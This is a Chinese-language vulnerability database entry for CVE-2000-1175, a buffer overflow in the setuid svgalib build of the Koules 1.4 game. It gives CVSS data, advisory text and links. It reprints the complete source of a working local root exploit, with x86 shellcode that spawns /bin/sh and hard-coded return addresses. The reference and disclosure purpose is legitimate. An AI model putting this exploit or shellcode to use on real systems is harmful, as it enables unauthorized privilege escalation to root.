CVE-2000-1175
CVSS7.2
发布时间 :2001-01-09 00:00:00
修订时间 :2008-09-05 16:22:50
NMCOES    

[原文]Buffer overflow in Koules 1.4 allows local users to execute arbitrary commands via a long command line argument.


[CNNVD]Koules Svgalib缓冲区远程漏洞(CNNVD-200101-033)

        Koules 1.4版本存在缓冲区溢出漏洞。本地用户可以借助超长命令行参数执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1175
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1175
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200101-033
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1967
(VENDOR_ADVISORY)  BID  1967
http://www.securityfocus.com/archive/1/145823
(VENDOR_ADVISORY)  BUGTRAQ  20001120 local exploit for linux's Koules1.4 package

- 漏洞信息

Koules Svgalib缓冲区远程漏洞
高危 缓冲区溢出
2001-01-09 00:00:00 2005-10-20 00:00:00
本地  
        Koules 1.4版本存在缓冲区溢出漏洞。本地用户可以借助超长命令行参数执行任意代码。

- 公告与补丁

        Currently the SecurityFocus staff are not ware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 漏洞信息 (20410)

Jan Hubicka Koules 1.4 Svgalib Buffer Overflow Vulnerability (EDBID:20410)
unix local
2000-11-20 Verified
0 Synnergy.net
N/A [点击下载]
source : http://www.securityfocus.com/bid/1967/info

Koules is an original, arcade-style game authored by Jan Hubicka. The version using svgalib is usually installed setuid root so that it may access video hardware when being run at the console by regular users. This version contains a buffer overflow vulnerability that may allow a user to gain higher priviledges. The vulnerability exists in handling of user-supplied commandline arguments.

Successful exploitation of this vulnerability leads to root compromise. Debian has announced they are not vulnerable to this problem.


/*
   Coolz.cpp - yep a C Plus Plus exploit, I like that Strings STL :)

   This problem has been known since April this year, but I have not
   seen any exploit so far.

   First of all I wasn't planning to go and release another ordinary stack
   smash, but I found the setuid game on some wargame/hackme I played on.
   Funny thing was that the exploitability proved to be a bit harder than I
   had anticipated at first.

   The problem can be found in the Koules1.4 package, code file:
      koules.sndsrv.linux.c - function: init()

   The `int i` disappears in the optimization gcc does. Since the strcat()
   function concatenates an array of filenames, `argv` gets ruined.
   This will cause the first run of the loop to fail.
   If argv point somewhere into adressable memory space, the chances of
   having a second pointer in there are close to zero, thus the second loop
   will fail.
   Last of all, if the argv[1] does point to a valid address the string
   contained there shouldn't be long enough to overwrite eip a second time,
   since that gets us into trouble. That's about it :)
   Even then, this ONLY works on machines that have compiled SVGALIB support
   in and NOT on the X windows version of 'koules'.

  Requested IRC quotes:
    <dagger02> ik heb jeuk aan me ballen.

    <marshal-> waar ben jij nu mee bezig man
    <sArGeAnt> nog een keer sukkel
    <sArGeAnt> en je ken es lekker kijken hoe packetjes je modem binnen komen

    <gmd-> sex ?

    <orangehaw> Scrippie HOU JE MOND OF Ik PACkEt Je ? ;)

    <silvio> chicks dig me when i place a bet, cause the mandelbrot sucks
             compare to the julia set

    <jimjones> 4 years ago there was no aol account i couldnt phish, now my
               unix virii grow faster than the petry dish

    <dugje>  I've seen nasa.gov navy.mil compaq.com and microsoft.com, there
             is only one goal left .. *.root-servers.net.

   Love goes out to: Hester and Maja
   Shouts go out to: Aad de Bruin, Karel Roos, L.G. Weert, Louis Maatman,
                     Richard Vriesde.
             --  We always did feel the same, we just saw it from a
                  different point of view...
                      [Bob Dylan - Tangled up in Blue]

<Scrippie> vraag me af wat ze zullen doen bij klpd als ze dat lezen (:
<dugje> ghehe ... je een plaatsje hoger zetten op de priority list ..

   -- Scrippie/ronald@grafix.nl
/*

/* Synnergy.net (c) 2000 */

#include <cstdio>
#include <string>
#include <cstdlib>
#include <unistd.h>

#define FILENAME "/usr/local/lib/koules/koules.sndsrv.linux"

#define NOP     'A'
#define NUMNOPS 500
#define RETADDY "\x90\xfe\xff\xbf"
/* Since we return in the cleared environment, we don't need to have a
   return address we can influence by command line "offset" arguments */

string heavenlycode =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char *addytostr(unsigned char *);

using namespace std;

main()
{
   string payload, vector;
   unsigned int i;
   const char *env[3];
   const char *ptr_to_bffffffc;

   /* Construction of our payload */
   payload.append(NUMNOPS, NOP);
   payload.append(heavenlycode);

   env[0] = payload.c_str();
   /* This memory address always contains 0x00000000 */
   env[1] = "\xfc\xff\xff\xbf";
   env[2] = NULL;

   /* Calculate for yourself, and check out: linux/fs/exec.c */
   ptr_to_bffffffc =
        addytostr((unsigned char *)(0xc0000000-sizeof(void *)-sizeof(FILENAME)
                                    -sizeof(heavenlycode)-sizeof(char *)-1));

   for(i=0;i<256;i++) {
      vector.append(RETADDY);           /* Fill the buffer */
   }
   /* We do NOT overwrite 'int i' - a register is used after gcc -O */
   vector.append(RETADDY);              /* Overwrites ebp */
   vector.append(RETADDY);              /* Overwrites eip */
   vector.append(ptr_to_bffffffc);      /* Overwrites argv argument */

   execle(FILENAME, "Segmentation fault (core dumped)", vector.c_str(), "A",
          NULL, env);

   perror("execle()");
}

char *addytostr(unsigned char *blaat)
{
   char *ret;

   if(!(ret = (char *)malloc(sizeof(unsigned char *)+1))) {
      perror("malloc()");
      exit(EXIT_FAILURE);
   }
   memcpy(ret, &blaat, sizeof(unsigned char *));
   ret[sizeof(unsigned char *)] = 0x00;

   return(ret);
}
		

- 漏洞信息

13763
Koules Long Command Line Argument Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2000-11-20 Unknow
2000-11-20 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Koules Svgalib Buffer Overflow Vulnerability
Boundary Condition Error 1967
No Yes
2000-11-20 12:00:00 2009-07-11 03:56:00
This vulnerability was announced by Guido Bakker <guidob@mainnet.nl> on November 20, 2000.

- 受影响的程序版本

Jan Hubicka Koules 1.4
- FreeBSD FreeBSD 4.2
- RedHat Linux 7.0
- Slackware Linux 7.1
FreeBSD FreeBSD 4.2
Debian Linux 2.2

- 不受影响的程序版本

FreeBSD FreeBSD 4.2
Debian Linux 2.2

- 漏洞讨论

Koules is an original, arcade-style game authored by Jan Hubicka. The version using svgalib is usually installed setuid root so that it may access video hardware when being run at the console by regular users. This version contains a buffer overflow vulnerability that may allow a user to gain higher priviledges. The vulnerability exists in handling of user-supplied commandline arguments.

Successful exploitation of this vulnerability leads to root compromise. Debian has announced they are not vulnerable to this problem.

- 漏洞利用

Exploit available:

- 解决方案

Currently the SecurityFocus staff are not ware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站